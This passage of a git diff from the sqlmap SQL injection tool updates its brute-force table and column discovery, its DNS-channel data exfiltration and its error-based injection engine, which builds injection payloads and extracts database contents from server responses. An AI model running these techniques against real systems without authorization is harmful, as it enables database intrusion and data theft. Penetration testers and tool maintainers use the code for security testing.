safeSQLIdentificatorNaming(tables[threadData.shared.count], True) - threadData.shared.count += 1 - kb.locks.count.release() - else: - kb.locks.count.release() - break - - if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): - fullTableName = "%s%s%s" % (conf.db, '..' if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', table) - else: - fullTableName = table - - result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName))) - - kb.locks.io.acquire() - - if result and table.lower() not in threadData.shared.unique: - threadData.shared.value.append(table) - threadData.shared.unique.add(table.lower()) - - if conf.verbose in (1, 2): - clearConsoleLine(True) - infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), table) - dataToStdout(infoMsg, True) - - if conf.verbose in (1, 2): - status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) - dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) - - kb.locks.io.release() - - try: - runThreads(conf.threads, tableExistsThread, threadChoice=True) - - except KeyboardInterrupt: - warnMsg = "user aborted during table existence " - warnMsg += "check. sqlmap will display partial output" - logger.warn(warnMsg) - - clearConsoleLine(True) - dataToStdout("\n") - - if not threadData.shared.value: - warnMsg = "no table(s) found" - logger.warn(warnMsg) - else: - for item in threadData.shared.value: - if conf.db not in kb.data.cachedTables: - kb.data.cachedTables[conf.db] = [item] - else: - kb.data.cachedTables[conf.db].append(item) - - for _ in ((conf.db, item) for item in threadData.shared.value): - if _ not in kb.brute.tables: - kb.brute.tables.append(_) - - hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True) - - return kb.data.cachedTables - -def columnExists(columnFile, regex=None): - if not conf.tbl: - errMsg = "missing table parameter" - raise SqlmapMissingMandatoryOptionException(errMsg) - - if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - conf.db = conf.db.upper() - - result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr()))) - - if result: - errMsg = "can't use column existence check because of detected invalid results " - errMsg += "(most probably caused by inability of the used injection " - errMsg += "to distinguish errornous results)" - raise SqlmapDataException(errMsg) - - infoMsg = "checking column existence using items from '%s'" % columnFile - logger.info(infoMsg) - - columns = getFileItems(columnFile, unique=True) - columns.extend(_addPageTextWords()) - columns = filterListValue(columns, regex) - - table = safeSQLIdentificatorNaming(conf.tbl, True) - - if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): - table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table) - - kb.threadContinue = True - kb.bruteMode = True - - threadData = getCurrentThreadData() - threadData.shared.count = 0 - threadData.shared.limit = len(columns) - threadData.shared.value = [] - - def columnExistsThread(): - threadData = getCurrentThreadData() - - while kb.threadContinue: - kb.locks.count.acquire() - if threadData.shared.count < threadData.shared.limit: - column = safeSQLIdentificatorNaming(columns[threadData.shared.count]) - threadData.shared.count += 1 - kb.locks.count.release() - else: - kb.locks.count.release() - break - - result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table))) - - kb.locks.io.acquire() - - if result: - threadData.shared.value.append(column) - - if conf.verbose in (1, 2): - clearConsoleLine(True) - infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), column) - dataToStdout(infoMsg, True) - - if conf.verbose in (1, 2): - status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) - dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) - - kb.locks.io.release() - - try: - runThreads(conf.threads, columnExistsThread, threadChoice=True) - - except KeyboardInterrupt: - warnMsg = "user aborted during column existence " - warnMsg += "check. sqlmap will display partial output" - logger.warn(warnMsg) - - clearConsoleLine(True) - dataToStdout("\n") - - if not threadData.shared.value: - warnMsg = "no column(s) found" - logger.warn(warnMsg) - else: - columns = {} - - for column in threadData.shared.value: - result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column))) - - if result: - columns[column] = 'numeric' - else: - columns[column] = 'non-numeric' - - kb.data.cachedColumns[conf.db] = {conf.tbl: columns} - - for _ in map(lambda x: (conf.db, conf.tbl, x[0], x[1]), columns.items()): - if _ not in kb.brute.columns: - kb.brute.columns.append(_) - - hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True) - - return kb.data.cachedColumns diff --git a/lib/techniques/dns/__init__.py b/lib/techniques/dns/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/lib/techniques/dns/__init__.py +++ b/lib/techniques/dns/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/lib/techniques/dns/test.py b/lib/techniques/dns/test.py index 260849bcadf..24ba334d5cc 100644 --- a/lib/techniques/dns/test.py +++ b/lib/techniques/dns/test.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.common import Backend @@ -14,7 +14,6 @@ from lib.core.exception import SqlmapNotVulnerableException from lib.techniques.dns.use import dnsUse - def dnsTest(payload): logger.info("testing for data retrieval through DNS channel") @@ -24,7 +23,7 @@ def dnsTest(payload): if not kb.dnsTest: errMsg = "data retrieval through DNS channel failed" if not conf.forceDns: - conf.dnsName = None + conf.dnsDomain = None errMsg += ". Turning off DNS exfiltration support" logger.error(errMsg) else: diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py index 88998d77483..78854c0122a 100644 --- a/lib/techniques/dns/use.py +++ b/lib/techniques/dns/use.py @@ -1,19 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re import time -from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import dataToStdout -from lib.core.common import decodeHexValue +from lib.core.common import decodeDbmsHexValue from lib.core.common import extractRegexResult from lib.core.common import getSQLSnippet from lib.core.common import hashDBRetrieve @@ -22,6 +21,7 @@ from lib.core.common import randomStr from lib.core.common import safeStringFormat from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -32,7 +32,7 @@ from lib.core.settings import PARTIAL_VALUE_MARKER from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request - +from lib.utils.safe2bin import safecharencode def dnsUse(payload, expression): """ @@ -46,7 +46,7 @@ def dnsUse(payload, expression): count = 0 offset = 1 - if conf.dnsName and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL): + if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL): output = hashDBRetrieve(expression, checkConf=True) if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None: @@ -58,19 +58,23 @@ def dnsUse(payload, expression): while True: count += 1 prefix, suffix = ("%s" % randomStr(length=3, alphabet=DNS_BOUNDARIES_ALPHABET) for _ in xrange(2)) - chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL / 4 - 2 + chunk_length = MAX_DNS_LABEL // 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2 _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression) nulledCastedField = agent.nullAndCastField(fieldToCastStr) + extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(fieldToCastStr), expression).group(0) + if extendedField != fieldToCastStr: # e.g. MIN(surname) + nulledCastedField = extendedField.replace(fieldToCastStr, nulledCastedField) + fieldToCastStr = extendedField nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length) nulledCastedField = agent.hexConvertField(nulledCastedField) expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1) - expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsName) + expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsDomain) expressionUnescaped = unescaper.escape(expressionRequest) if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL): query = agent.prefixQuery("; %s" % expressionUnescaped) - query = agent.suffixQuery(query) + query = "%s%s" % (query, queries[Backend.getIdentifiedDbms()].comment.query) forgedPayload = agent.payload(newValue=query) else: forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3))) @@ -80,8 +84,8 @@ def dnsUse(payload, expression): _ = conf.dnsServer.pop(prefix, suffix) if _: - _ = extractRegexResult("%s\.(?P<result>.+)\.%s" % (prefix, suffix), _, re.I) - _ = decodeHexValue(_) + _ = extractRegexResult(r"%s\.(?P<result>.+)\.%s" % (prefix, suffix), _, re.I) + _ = decodeDbmsHexValue(_) output = (output or "") + _ offset += len(_) @@ -90,22 +94,24 @@ def dnsUse(payload, expression): else: break + output = decodeDbmsHexValue(output) if conf.hexConvert else output + kb.dnsMode = False if output is not None: retVal = output if kb.dnsTest is not None: - dataToStdout("[%s] [INFO] %s: %s\r\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output))) + dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output))) if count > 0: hashDBWrite(expression, output) if not kb.bruteMode: - debugMsg = "performed %d queries in %d seconds" % (count, calculateDeltaSeconds(start)) + debugMsg = "performed %d quer%s in %.2f seconds" % (count, 'y' if count == 1 else "ies", calculateDeltaSeconds(start)) logger.debug(debugMsg) - elif conf.dnsName: + elif conf.dnsDomain: warnMsg = "DNS data exfiltration method through SQL injection " warnMsg += "is currently not available for DBMS %s" % Backend.getIdentifiedDbms() singleTimeWarnMessage(warnMsg) diff --git a/lib/techniques/error/__init__.py b/lib/techniques/error/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/lib/techniques/error/__init__.py +++ b/lib/techniques/error/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 54b509b73cc..a9ae8bac007 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -1,22 +1,27 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import print_function + import re import time -from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent from lib.core.bigarray import BigArray from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import dataToStdout -from lib.core.common import decodeHexValue +from lib.core.common import decodeDbmsHexValue from lib.core.common import extractRegexResult -from lib.core.common import getUnicode +from lib.core.common import firstNotNone +from lib.core.common import getConsoleWidth +from lib.core.common import getPartRun +from lib.core.common import getTechnique +from lib.core.common import getTechniqueData from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import incrementCounter @@ -26,20 +31,26 @@ from lib.core.common import listToStrValue from lib.core.common import readInput from lib.core.common import unArrayizeValue -from lib.core.convert import hexdecode -from lib.core.convert import htmlunescape +from lib.core.common import wasLastResponseHTTPError +from lib.core.compat import xrange +from lib.core.convert import decodeHex +from lib.core.convert import getUnicode +from lib.core.convert import htmlUnescape from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import DBMS -from lib.core.enums import PAYLOAD +from lib.core.enums import HASHDB_KEYS +from lib.core.enums import HTTP_HEADER +from lib.core.exception import SqlmapDataException from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD -from lib.core.settings import MYSQL_ERROR_CHUNK_LENGTH -from lib.core.settings import MSSQL_ERROR_CHUNK_LENGTH +from lib.core.settings import MAX_ERROR_CHUNK_LENGTH +from lib.core.settings import MIN_ERROR_CHUNK_LENGTH from lib.core.settings import NULL from lib.core.settings import PARTIAL_VALUE_MARKER +from lib.core.settings import ROTATING_CHARS from lib.core.settings import SLOW_ORDER_COUNT_THRESHOLD from lib.core.settings import SQL_SCALAR_REGEX from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT @@ -47,9 +58,13 @@ from lib.core.threads import runThreads from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request +from lib.utils.progress import ProgressBar +from lib.utils.safe2bin import safecharencode +from thirdparty import six -def _oneShotErrorUse(expression, field=None): +def _oneShotErrorUse(expression, field=None, chunkTest=False): offset = 1 + rotator = 0 partialValue = None threadData = getCurrentThreadData() retVal = hashDBRetrieve(expression, checkConf=True) @@ -61,31 +76,58 @@ def _oneShotErrorUse(expression, field=None): threadData.resumed = retVal is not None and not partialValue - if Backend.isDbms(DBMS.MYSQL): - chunk_length = MYSQL_ERROR_CHUNK_LENGTH - elif Backend.isDbms(DBMS.MSSQL): - chunk_length = MSSQL_ERROR_CHUNK_LENGTH - else: - chunk_length = None + if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)) and kb.errorChunkLength is None and not chunkTest and not kb.testMode: + debugMsg = "searching for error chunk length..." + logger.debug(debugMsg) + + seen = set() + current = MAX_ERROR_CHUNK_LENGTH + while current >= MIN_ERROR_CHUNK_LENGTH: + testChar = str(current % 10) + + if Backend.isDbms(DBMS.ORACLE): + testQuery = "RPAD('%s',%d,'%s')" % (testChar, current, testChar) + else: + testQuery = "%s('%s',%d)" % ("REPEAT" if Backend.isDbms(DBMS.MYSQL) else "REPLICATE", testChar, current) + testQuery = "SELECT %s" % (agent.hexConvertField(testQuery) if conf.hexConvert else testQuery) + + result = unArrayizeValue(_oneShotErrorUse(testQuery, chunkTest=True)) + seen.add(current) + + if (result or "").startswith(testChar): + if result == testChar * current: + kb.errorChunkLength = current + break + else: + result = re.search(r"\A\w+", result).group(0) + candidate = len(result) - len(kb.chars.stop) + current = candidate if candidate != current and candidate not in seen else current - 1 + else: + current = current // 2 + + if kb.errorChunkLength: + hashDBWrite(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH, kb.errorChunkLength) + else: + kb.errorChunkLength = 0 if retVal is None or partialValue: try: while True: - check = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) - trimcheck = "%s(?P<result>.*?)</" % (kb.chars.start) + check = r"(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) + trimCheck = r"(?si)%s(?P<result>[^<\n]*)" % kb.chars.start if field: nulledCastedField = agent.nullAndCastField(field) - if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)) and not any(_ in field for _ in ("COUNT", "CASE")): # skip chunking of scalar expression (unneeded) + if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)) and not any(_ in field for _ in ("COUNT", "CASE")) and kb.errorChunkLength and not chunkTest: extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(field), expression).group(0) if extendedField != field: # e.g. MIN(surname) nulledCastedField = extendedField.replace(field, nulledCastedField) field = extendedField - nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length) + nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, kb.errorChunkLength) # Forge the error-based SQL injection request - vector = kb.injection.data[kb.technique].vector + vector = getTechniqueData().vector query = agent.prefixQuery(vector) query = agent.suffixQuery(query) injExpression = expression.replace(field, nulledCastedField, 1) if field else expression @@ -94,76 +136,99 @@ def _oneShotErrorUse(expression, field=None): payload = agent.payload(newValue=injExpression) # Perform the request - page, headers = Request.queryPage(payload, content=True) + page, headers, _ = Request.queryPage(payload, content=True, raise404=False) + + incrementCounter(getTechnique()) - incrementCounter(kb.technique) + if page and conf.noEscape: + page = re.sub(r"('|\%%27)%s('|\%%27).*?('|\%%27)%s('|\%%27)" % (kb.chars.start, kb.chars.stop), "", page) # Parse the returned page to get the exact error-based # SQL injection output - output = reduce(lambda x, y: x if x is not None else y, (\ - extractRegexResult(check, page, re.DOTALL | re.IGNORECASE), \ - extractRegexResult(check, listToStrValue(headers.headers \ - if headers else None), re.DOTALL | re.IGNORECASE), \ - extractRegexResult(check, threadData.lastRedirectMsg[1] \ - if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \ - threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)), \ - None) + output = firstNotNone( + extractRegexResult(check, page), + extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), + extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)), + extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) + ) if output is not None: output = getUnicode(output) else: - trimmed = extractRegexResult(trimcheck, page, re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(trimcheck, listToStrValue(headers.headers \ - if headers else None), re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] \ - if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \ - threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) + trimmed = firstNotNone( + extractRegexResult(trimCheck, page), + extractRegexResult(trimCheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), + extractRegexResult(trimCheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)), + extractRegexResult(trimCheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) + ) if trimmed: - warnMsg = "possible server trimmed output detected " - warnMsg += "(due to its length and/or content): " - warnMsg += safecharencode(trimmed) - logger.warn(warnMsg) - - if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)): + if not chunkTest: + warnMsg = "possible server trimmed output detected " + warnMsg += "(due to its length and/or content): " + warnMsg += safecharencode(trimmed) + logger.warning(warnMsg) + + if not kb.testMode: + check = r"(?P<result>[^<>\n]*?)%s" % kb.chars.stop[:2] + output = extractRegexResult(check, trimmed, re.IGNORECASE) + + if not output: + check = r"(?P<result>[^\s<>'\"]+)" + output = extractRegexResult(check, trimmed, re.IGNORECASE) + else: + output = output.rstrip() + + if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)): if offset == 1: retVal = output else: retVal += output if output else '' - if output and len(output) >= chunk_length: - offset += chunk_length + if output and kb.errorChunkLength and len(output) >= kb.errorChunkLength and not chunkTest: + offset += kb.errorChunkLength else: break - if kb.fileReadMode and output: - dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t")) + if output and conf.verbose in (1, 2) and not any((conf.api, kb.bruteMode)): + if kb.fileReadMode: + dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t")) + elif offset > 1: + rotator += 1 + + if rotator >= len(ROTATING_CHARS): + rotator = 0 + + dataToStdout("\r%s\r" % ROTATING_CHARS[rotator]) else: retVal = output break except: - hashDBWrite(expression, "%s%s" % (retVal, PARTIAL_VALUE_MARKER)) + if retVal is not None: + hashDBWrite(expression, "%s%s" % (retVal, PARTIAL_VALUE_MARKER)) raise - retVal = decodeHexValue(retVal) if conf.hexConvert else retVal + retVal = decodeDbmsHexValue(retVal) if conf.hexConvert else retVal - if isinstance(retVal, basestring): - retVal = htmlunescape(retVal).replace("<br>", "\n") + if isinstance(retVal, six.string_types): + retVal = htmlUnescape(retVal).replace("<br>", "\n") retVal = _errorReplaceChars(retVal) - hashDBWrite(expression, retVal) + if retVal is not None: + hashDBWrite(expression, retVal) else: - _ = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) - retVal = extractRegexResult(_, retVal, re.DOTALL | re.IGNORECASE) or retVal + _ = "(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) + retVal = extractRegexResult(_, retVal) or retVal return safecharencode(retVal) if kb.safeCharEncode else retVal -def _errorFields(expression, expressionFields, expressionFieldsList, num=None, emptyFields=None): +def _errorFields(expression, expressionFields, expressionFieldsList, num=None, emptyFields=None, suppressOutput=False): values = [] origExpr = None + width = getConsoleWidth() threadData = getCurrentThreadData() for field in expressionFieldsList: @@ -186,10 +251,16 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e if not kb.threadContinue: return None - if kb.fileReadMode and output and output.strip(): - print - elif output is not None and not (threadData.resumed and kb.suppressResumeInfo) and not (emptyFields and field in emptyFields): - logger.info("%s: %s" % ("resumed" if threadData.resumed else "retrieved", safecharencode(output))) + if not any((suppressOutput, kb.bruteMode)): + if kb.fileReadMode and output and output.strip(): + print() + elif output is not None and not (threadData.resumed and kb.suppressResumeInfo) and not (emptyFields and field in emptyFields): + status = "[%s] [INFO] %s: '%s'" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", output if kb.safeCharEncode else safecharencode(output)) + + if len(status) > width and not conf.noTruncate: + status = "%s..." % status[:width - 3] + + dataToStdout("%s\n" % status) if isinstance(num, int): expression = origExpr @@ -215,9 +286,9 @@ def _formatPartialContent(value): Prepares (possibly hex-encoded) partial content for safe console output """ - if value and isinstance(value, basestring): + if value and isinstance(value, six.string_types): try: - value = hexdecode(value) + value = decodeHex(value, binary=False) except: pass finally: @@ -231,7 +302,7 @@ def errorUse(expression, dump=False): SQL injection vulnerability on the affected parameter. """ - initTechnique(kb.technique) + initTechnique(getTechnique()) abortedFlag = False count = None @@ -243,24 +314,22 @@ def errorUse(expression, dump=False): _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) + # Set kb.partRun in case the engine is called from the API + kb.partRun = getPartRun(alias=False) if conf.api else None + # We have to check if the SQL query might return multiple entries # and in such case forge the SQL limiting the query output one # entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries - if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in \ - expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) \ - or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \ - expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ - and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) \ - and not re.search(SQL_SCALAR_REGEX, expression, re.I): + if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) if limitCond: # Count the number of SQL query entries output countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) - if " ORDER BY " in expression.upper(): + if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] @@ -273,110 +342,129 @@ def errorUse(expression, dump=False): else: stopLimit = int(count) - infoMsg = "the SQL query used returns " - infoMsg += "%d entries" % stopLimit - logger.info(infoMsg) + debugMsg = "used SQL query returns " + debugMsg += "%d %s" % (stopLimit, "entries" if stopLimit > 1 else "entry") + logger.debug(debugMsg) elif count and not count.isdigit(): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" - logger.warn(warnMsg) + logger.warning(warnMsg) stopLimit = 1 - elif (not count or int(count) == 0): + elif not isNumPosStrValue(count): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" - logger.warn(warnMsg) + logger.warning(warnMsg) else: value = [] # for empty tables return value - if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD: - message = "due to huge table size do you want to remove " - message += "ORDER BY clause gaining speed over consistency? [y/N] " - _ = readInput(message, default="N") - - if _ and _[0] in ("y", "Y"): - expression = expression[:expression.index(" ORDER BY ")] - - threadData = getCurrentThreadData() - threadData.shared.limits = iter(xrange(startLimit, stopLimit)) - numThreads = min(conf.threads, (stopLimit - startLimit)) - threadData.shared.value = BigArray() - threadData.shared.buffered = [] - threadData.shared.lastFlushed = startLimit - 1 - - if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD): - for field in expressionFieldsList: - if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0': - emptyFields.append(field) - debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable) - debugMsg += "dumped as it appears to be empty" - logger.debug(debugMsg) - - if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: - kb.suppressResumeInfo = True - debugMsg = "suppressing possible resume console info because of " - debugMsg += "large number of rows. It might take too long" - logger.debug(debugMsg) - - try: - def errorThread(): - threadData = getCurrentThreadData() - - while kb.threadContinue: - with kb.locks.limit: - try: - num = threadData.shared.limits.next() - except StopIteration: - break - - output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields) - - if not kb.threadContinue: - break - - if output and isListLike(output) and len(output) == 1: - output = output[0] - - with kb.locks.value: - index = None - for index in xrange(len(threadData.shared.buffered)): - if threadData.shared.buffered[index][0] >= num: + if isNumPosStrValue(count) and int(count) > 1: + if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD: + message = "due to huge table size do you want to remove " + message += "ORDER BY clause gaining speed over consistency? [y/N] " + + if readInput(message, default='N', boolean=True): + expression = expression[:expression.index(" ORDER BY ")] + + numThreads = min(conf.threads, (stopLimit - startLimit)) + + threadData = getCurrentThreadData() + + try: + threadData.shared.limits = iter(xrange(startLimit, stopLimit)) + except OverflowError: + errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) + errMsg += "with switch '--fresh-queries'" + raise SqlmapDataException(errMsg) + + threadData.shared.value = BigArray() + threadData.shared.buffered = [] + threadData.shared.counter = 0 + threadData.shared.lastFlushed = startLimit - 1 + threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 + + if threadData.shared.showEta: + threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) + + if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD): + for field in expressionFieldsList: + if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0': + emptyFields.append(field) + debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable) + debugMsg += "dumped as it appears to be empty" + logger.debug(debugMsg) + + if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: + kb.suppressResumeInfo = True + debugMsg = "suppressing possible resume console info because of " + debugMsg += "large number of rows. It might take too long" + logger.debug(debugMsg) + + try: + def errorThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + with kb.locks.limit: + try: + threadData.shared.counter += 1 + num = next(threadData.shared.limits) + except StopIteration: break - threadData.shared.buffered.insert(index or 0, (num, output)) - while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]: - threadData.shared.lastFlushed += 1 - threadData.shared.value.append(threadData.shared.buffered[0][1]) - del threadData.shared.buffered[0] - runThreads(numThreads, errorThread) + output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta) - except KeyboardInterrupt: - abortedFlag = True - warnMsg = "user aborted during enumeration. sqlmap " - warnMsg += "will display partial output" - logger.warn(warnMsg) + if not kb.threadContinue: + break - finally: - threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered)) - value = threadData.shared.value - kb.suppressResumeInfo = 